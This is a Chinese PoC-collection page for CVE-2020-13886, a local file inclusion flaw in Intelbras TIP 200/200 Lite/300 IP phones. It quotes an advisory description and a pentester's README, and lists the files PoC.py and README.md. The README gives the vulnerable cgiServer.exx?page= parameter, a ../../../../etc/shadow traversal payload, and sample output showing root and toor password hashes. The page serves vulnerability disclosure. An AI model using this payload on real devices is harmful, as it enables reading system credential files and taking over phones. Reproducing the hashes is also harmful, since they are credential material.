关联漏洞
标题:多款 Intelbras 产品路径遍历漏洞 (CVE-2020-13886)Description:Intelbras Intelbras TIP 200是巴西Intelbras公司的一款IP电话产品。该设备是一个IP终端,最多支持两个SIP账户,拥有高语音质量(HD Voice)、LCD(2x15)、电源PoE(以太网供电)等功能。Intelbras Intelbras TIP 200 Lite是巴西Intelbras公司的一款IP电话产品。该设备是一个IP终端,最多支持两个SIP账户,拥有高语音质量(HD Voice)、LCD(2x15)、电源PoE(以太网供电)等功能。 Intelbras 多款产
Description
Exploit CVE-2020-13886 - LFI Intelbras TIP 200 / 200 LITE /
介绍
PoC: https://youtu.be/nNKBRx8IglI
-------------------------------------------------------------------------------------------------------------
------------- 0day: TELEFONE IP TIP200/200 LITE & TIP 300 | Local File Include | ----------------------------
------------------------------- P0c Author: Lucas Souza | Pentester at ProsecT ------------------------------
-------------------------------------------------------------------------------------------------------------
URL parameter ->http://HOST/cgi-bin/cgiServer.exx?page=
LFI payload -> ../../../../etc/shadow
root:$1$.jKlhz0B$/Nmgj0klrsZk0nYc1BLUR/:11876:0:99999:7:::
toor:$1$6sa7xxqo$eV3t7Nb1tPqjOWT1s3/ks1:11876:0:99999:7:::
https://prosect.com.br/
文件快照
[4.0K] /data/pocs/efccc013ded617ad0caf15b10b6e8eb447b95b4e
├── [2.0K] PoC.py
└── [ 824] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。